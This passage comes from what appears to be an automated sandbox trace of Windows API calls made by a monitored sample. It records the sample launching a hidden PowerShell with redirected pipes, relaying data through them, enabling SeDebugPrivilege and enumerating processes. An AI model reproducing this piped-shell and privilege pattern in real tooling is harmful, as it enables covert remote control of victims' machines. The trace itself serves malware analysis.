flAllocationType=0x1000, flProtect=0x4) returned 0xc0001be000 [0094.163] VirtualAlloc (lpAddress=0xc0001c0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0001c0000 [0094.163] GetCurrentProcess () returned 0xffffffffffffffff [0094.163] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xdc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xc000180700, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0xc000180700*=0x108) returned 1 [0094.163] VirtualAlloc (lpAddress=0xc0001c4000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0001c4000 [0094.167] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xd0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xc000180708, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0xc000180708*=0x10c) returned 1 [0094.167] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xc000180710, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0xc000180710*=0x110) returned 1 [0094.167] VirtualAlloc (lpAddress=0xc0001c6000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0001c6000 [0094.168] VirtualAlloc (lpAddress=0xc0001ca000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0001ca000 [0094.168] VirtualAlloc (lpAddress=0xc0001ce000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0001ce000 [0094.169] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="powershell.exe -NoExit -Command -", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0xc0001ce000, lpCurrentDirectory=0x0, lpStartupInfo=0xc0000cb798*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x108, hStdOutput=0x10c, hStdError=0x110), lpProcessInformation=0xc0000cb6a8 | out: lpCommandLine="powershell.exe -NoExit -Command -", lpProcessInformation=0xc0000cb6a8*(hProcess=0x118, hThread=0x114, dwProcessId=0x860, dwThreadId=0x870)) returned 1 [0094.189] CloseHandle (hObject=0x114) returned 1 [0094.189] CloseHandle (hObject=0x110) returned 1 [0094.190] CloseHandle (hObject=0x10c) returned 1 [0094.190] CloseHandle (hObject=0x108) returned 1 [0094.190] CancelIoEx (hFile=0xdc, lpOverlapped=0x0) returned 0 [0094.190] CloseHandle (hObject=0xdc) returned 1 [0094.190] CancelIoEx (hFile=0xd0, lpOverlapped=0x0) returned 0 [0094.190] CloseHandle (hObject=0xd0) returned 1 [0094.190] CancelIoEx (hFile=0xf8, lpOverlapped=0x0) returned 0 [0094.190] CloseHandle (hObject=0xf8) returned 1 [0094.190] VirtualAlloc (lpAddress=0xc0001d0000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0001d0000 [0094.190] VirtualAlloc (lpAddress=0xc0001d6000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0001d6000 [0094.191] CryptGenRandom (in: hProv=0x891660, dwLen=0xc, pbBuffer=0xc0001844f0 | out: pbBuffer=0xc0001844f0) returned 1 [0094.198] CryptGenRandom (in: hProv=0x891660, dwLen=0xc, pbBuffer=0xc000184500 | out: pbBuffer=0xc000184500) returned 1 [0094.198] VirtualAlloc (lpAddress=0xc0001dc000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0001dc000 [0094.199] WriteFile (in: hFile=0xd4, lpBuffer=0xc0001d3600*, nNumberOfBytesToWrite=0xd13, lpNumberOfBytesWritten=0xc0000cba14, lpOverlapped=0x0 | out: lpBuffer=0xc0001d3600*, lpNumberOfBytesWritten=0xc0000cba14*=0xd13, lpOverlapped=0x0) returned 1 [0094.199] VirtualAlloc (lpAddress=0xc0001de000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0001de000 [0094.199] SetEvent (hEvent=0x84) returned 1 [0094.200] ReadFile (in: hFile=0xfc, lpBuffer=0xc000196900, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000111ddc, lpOverlapped=0x0 | out: lpBuffer=0xc000196900*, lpNumberOfBytesRead=0xc000111ddc*=0x2, lpOverlapped=0x0) returned 1 [0251.240] ReadFile (in: hFile=0xfc, lpBuffer=0xc0000baa00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000111ddc, lpOverlapped=0x0 | out: lpBuffer=0xc0000baa00, lpNumberOfBytesRead=0xc000111ddc*=0x0, lpOverlapped=0x0) returned 0 [0260.938] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0xffffffff) Thread: id = 5 os_tid = 0xbd8 [0056.997] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x27e8fea0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x27e8fea0*=0xa8) returned 1 [0056.997] VirtualQuery (in: lpAddress=0x27e8fec0, lpBuffer=0x27e8fec0, dwLength=0x30 | out: lpBuffer=0x27e8fec0*(BaseAddress=0x27e8f000, AllocationBase=0x27c90000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0056.997] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac [0056.997] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xb0 [0056.997] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0xffffffff) returned 0x0 [0057.034] SetEvent (hEvent=0xa0) returned 1 [0057.035] SwitchToThread () returned 1 [0057.035] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0xffffffff) Thread: id = 7 os_tid = 0x5bc [0057.998] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x2835fea0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x2835fea0*=0xe4) returned 1 [0057.999] VirtualQuery (in: lpAddress=0x2835fec0, lpBuffer=0x2835fec0, dwLength=0x30 | out: lpBuffer=0x2835fec0*(BaseAddress=0x2835f000, AllocationBase=0x28160000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0057.999] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xd8 [0057.999] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xcc [0057.999] WaitForSingleObject (hHandle=0xd8, dwMilliseconds=0xffffffff) Thread: id = 8 os_tid = 0x6ec [0057.999] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x2855fea0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x2855fea0*=0xe8) returned 1 [0057.999] VirtualQuery (in: lpAddress=0x2855fec0, lpBuffer=0x2855fec0, dwLength=0x30 | out: lpBuffer=0x2855fec0*(BaseAddress=0x2855f000, AllocationBase=0x28360000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0057.999] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xec [0057.999] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xf0 [0057.999] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0094.210] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0094.227] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0175.054] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0179.037] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0185.076] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0198.699] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0200.277] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0202.120] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0206.778] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0209.018] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0211.699] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0213.571] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0218.236] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0220.620] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0222.330] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0223.879] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0225.381] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0227.631] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0229.392] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0230.741] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0232.031] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0234.564] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0235.747] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0236.753] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0237.740] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0238.024] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0239.065] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0239.099] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0240.126] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0240.296] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0242.621] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0243.620] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0244.713] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0245.662] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0247.189] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0248.179] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0249.114] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0250.133] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0251.153] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0251.250] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0253.225] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0254.613] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0255.746] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0256.787] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0257.771] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0259.174] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) Process: id = "2" image_name = "powershell.exe" filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x43e5c000" os_pid = "0xa24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaac" cmd_line = "powershell.exe -NoExit -Command -" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 6 os_tid = 0x5c4 [0068.804] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0069.184] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0069.185] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0069.185] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0069.185] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0069.778] GetVersionExW (in: lpVersionInformation=0x1adc80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1adc80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0069.782] GetVersionExW (in: lpVersionInformation=0x1adc80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1adc80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0069.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.804] GetVersionExW (in: lpVersionInformation=0x1ad9f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ad9f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0069.805] SetErrorMode (uMode=0x1) returned 0x1 [0069.807] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1adb50 | out: lpFileInformation=0x1adb50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0069.809] SetErrorMode (uMode=0x1) returned 0x1 [0069.814] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1addc0 | out: lpdwHandle=0x1addc0) returned 0x94c [0069.816] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cf6fd8 | out: lpData=0x2cf6fd8) returned 1 [0069.820] VerQueryValueW (in: pBlock=0x2cf6fd8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1add38, puLen=0x1add30 | out: lplpBuffer=0x1add38*=0x2cf7074, puLen=0x1add30) returned 1 [0069.825] lstrlenW (lpString="䅁") returned 1 [0069.880] VerQueryValueW (in: pBlock=0x2cf6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1adca8, puLen=0x1adca0 | out: lplpBuffer=0x1adca8*=0x2cf7150, puLen=0x1adca0) returned 1 [0069.881] lstrlenW (lpString="Microsoft Corporation") returned 21 [0069.883] CoTaskMemAlloc (cb=0x2e) returned 0x478b10 [0069.883] lstrcpyW (in: lpString1=0x478b10, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0069.885] CoTaskMemFree (pv=0x478b10) [0069.885] VerQueryValueW (in: pBlock=0x2cf6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1adca8, puLen=0x1adca0 | out: lplpBuffer=0x1adca8*=0x2cf71a4, puLen=0x1adca0) returned 1 [0069.885] lstrlenW (lpString="System.Management.Automation") returned 28 [0069.885] CoTaskMemAlloc (cb=0x3c) returned 0x479e70 [0069.885] lstrcpyW (in: lpString1=0x479e70, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0069.885] CoTaskMemFree (pv=0x479e70) [0069.885] VerQueryValueW (in: pBlock=0x2cf6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1adca8, puLen=0x1adca0 | out: lplpBuffer=0x1adca8*=0x2cf7200, puLen=0x1adca0) returned 1 [0069.885] lstrlenW (lpString="6.1.7601.17514") returned 14 [0069.885] CoTaskMemAlloc (cb=0x20) returned 0x47f9e0 [0069.885] lstrcpyW (in: lpString1=0x47f9e0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0069.885] CoTaskMemFree (pv=0x47f9e0) [0069.885] VerQueryValueW (in: pBlock=0x2cf6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1adca8, puLen=0x1adca0 | out: lplpBuffer=0x1adca8*=0x2cf7240, puLen=0x1adca0) returned 1 [0069.885] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0069.885] CoTaskMemAlloc (cb=0x44) returned 0x479e70 [0069.885] lstrcpyW (in: lpString1=0x479e70, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0069.885] CoTaskMemFree (pv=0x479e70) [0069.885] VerQueryValueW (in: pBlock=0x2cf6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1adca8, puLen=0x1adca0 | out: lplpBuffer=0x1adca8*=0x2cf72a8, puLen=0x1adca0) returned 1 [0069.885] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0069.885] CoTaskMemAlloc (cb=0x76) returned 0x4196e0 [0069.886] lstrcpyW (in: lpString1=0x4196e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0069.886] CoTaskMemFree (pv=0x4196e0) [0069.886] VerQueryValueW (in: pBlock=0x2cf6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1adca8, puLen=0x1adca0 | out: lplpBuffer=0x1adca8*=0x2cf7344, puLen=0x1adca0) returned 1 [0069.886] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0069.886] CoTaskMemAlloc (cb=0x44) returned 0x479e70 [0069.886] lstrcpyW (in: lpString1=0x479e70, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0069.886] CoTaskMemFree (pv=0x479e70) [0069.886] VerQueryValueW (in: pBlock=0x2cf6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1adca8, puLen=0x1adca0 | out: lplpBuffer=0x1adca8*=0x2cf73a8, puLen=0x1adca0) returned 1 [0069.886] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0069.886] CoTaskMemAlloc (cb=0x58) returned 0x3e3480 [0069.886] lstrcpyW (in: lpString1=0x3e3480, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0069.886] CoTaskMemFree (pv=0x3e3480) [0069.886] VerQueryValueW (in: pBlock=0x2cf6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1adca8, puLen=0x1adca0 | out: lplpBuffer=0x1adca8*=0x2cf7424, puLen=0x1adca0) returned 1 [0069.886] lstrlenW (lpString="6.1.7601.17514") returned 14 [0069.886] CoTaskMemAlloc (cb=0x20) returned 0x47f9e0 [0069.886] lstrcpyW (in: lpString1=0x47f9e0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0069.886] CoTaskMemFree (pv=0x47f9e0) [0069.886] VerQueryValueW (in: pBlock=0x2cf6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1adca8, puLen=0x1adca0 | out: lplpBuffer=0x1adca8*=0x2cf70cc, puLen=0x1adca0) returned 1 [0069.886] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0069.886] CoTaskMemAlloc (cb=0x66) returned 0x3eecd0 [0069.886] lstrcpyW (in: lpString1=0x3eecd0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0069.886] CoTaskMemFree (pv=0x3eecd0) [0069.886] VerQueryValueW (in: pBlock=0x2cf6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1adca8, puLen=0x1adca0 | out: lplpBuffer=0x1adca8*=0x0, puLen=0x1adca0) returned 0 [0069.886] VerQueryValueW (in: pBlock=0x2cf6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1adca8, puLen=0x1adca0 | out: lplpBuffer=0x1adca8*=0x0, puLen=0x1adca0) returned 0 [0069.886] VerQueryValueW (in: pBlock=0x2cf6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1adca8, puLen=0x1adca0 | out: lplpBuffer=0x1adca8*=0x0, puLen=0x1adca0) returned 0 [0069.886] VerQueryValueW (in: pBlock=0x2cf6fd8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1adc78, puLen=0x1adc70 | out: lplpBuffer=0x1adc78*=0x2cf7074, puLen=0x1adc70) returned 1 [0069.896] CoTaskMemAlloc (cb=0x204) returned 0x432860 [0069.896] VerLanguageNameW (in: wLang=0x0, szLang=0x432860, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0069.897] CoTaskMemFree (pv=0x432860) [0069.897] VerQueryValueW (in: pBlock=0x2cf6fd8, lpSubBlock="\\", lplpBuffer=0x1adcc8, puLen=0x1adcc0 | out: lplpBuffer=0x1adcc8*=0x2cf7000, puLen=0x1adcc0) returned 1 [0069.903] GetCurrentProcessId () returned 0xa24 [0069.920] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1acbf0 | out: lpLuid=0x1acbf0*(LowPart=0x14, HighPart=0)) returned 1 [0069.924] GetCurrentProcess () returned 0xffffffffffffffff [0069.925] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1acc10 | out: TokenHandle=0x1acc10*=0x300) returned 1 [0069.926] AdjustTokenPrivileges (in: TokenHandle=0x300, DisableAllPrivileges=0, NewState=0x2cfa850*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0069.927] CloseHandle (hObject=0x300) returned 1 [0069.932] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa24) returned 0x300 [0069.964] EnumProcessModules (in: hProcess=0x300, lphModule=0x2cfa8b8, cb=0x200, lpcbNeeded=0x1adc28 | out: lphModule=0x2cfa8b8, lpcbNeeded=0x1adc28) returned 1 [0069.967] GetModuleInformation (in: hProcess=0x300, hModule=0x13faa0000, lpmodinfo=0x2cfab28, cb=0x18 | out: lpmodinfo=0x2cfab28*(lpBaseOfDll=0x13faa0000, SizeOfImage=0x77000, EntryPoint=0x13faac63c)) returned 1 [0069.969] CoTaskMemAlloc (cb=0x804) returned 0x481ba0 [0069.969] GetModuleBaseNameW (in: hProcess=0x300, hModule=0x13faa0000, lpBaseName=0x481ba0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0069.969] CoTaskMemFree (pv=0x481ba0) [0069.970] CoTaskMemAlloc (cb=0x804) returned 0x481ba0 [0069.970] GetModuleFileNameExW (in: hProcess=0x300, hModule=0x13faa0000, lpFilename=0x481ba0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0069.971] CoTaskMemFree (pv=0x481ba0) [0069.971] CloseHandle (hObject=0x300) returned 1 [0069.980] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xa24) returned 0x300 [0069.981] GetExitCodeProcess (in: hProcess=0x300, lpExitCode=0x1add58 | out: lpExitCode=0x1add58*=0x103) returned 1 [0069.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12cfb088, Length=0x20000, ResultLength=0x1add20 | out: SystemInformation=0x12cfb088, ResultLength=0x1add20*=0x11568) returned 0x0 [0070.016] EnumWindows (lpEnumFunc=0x2ac66ac, lParam=0x0) returned 0 [0070.017] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x1ada80 | out: lpdwProcessId=0x1ada80) returned 0x4ac [0070.017] GetWindowThreadProcessId (in: hWnd=0x40276, lpdwProcessId=0x1ada80 | out: lpdwProcessId=0x1ada80) returned 0x4ac [0070.017] GetWindowThreadProcessId (in: hWnd=0x3013c, lpdwProcessId=0x1ada80 | out: lpdwProcessId=0x1ada80) returned 0x538 [0070.017] GetWindowThreadProcessId (in: hWnd=0x300b6, lpdwProcessId=0x1ada80 | out: lpdwProcessId=0x1ada80) returned 0x4ac [0070.018] GetWindowThreadProcessId (in: hWnd=0x300ba, lpdwProcessId=0x1ada80 | out: lpdwProcessId=0x1ada80) returned 0x4ac [0070.018] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x1ada80 | out: lpdwProcessId=0x1ada80) returned 0x4ac [0070.018] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x1ada80 | out: lpdwProcessId=0x1ada80) returned 0x514 [0070.018] GetWindowThreadProcessId (in: 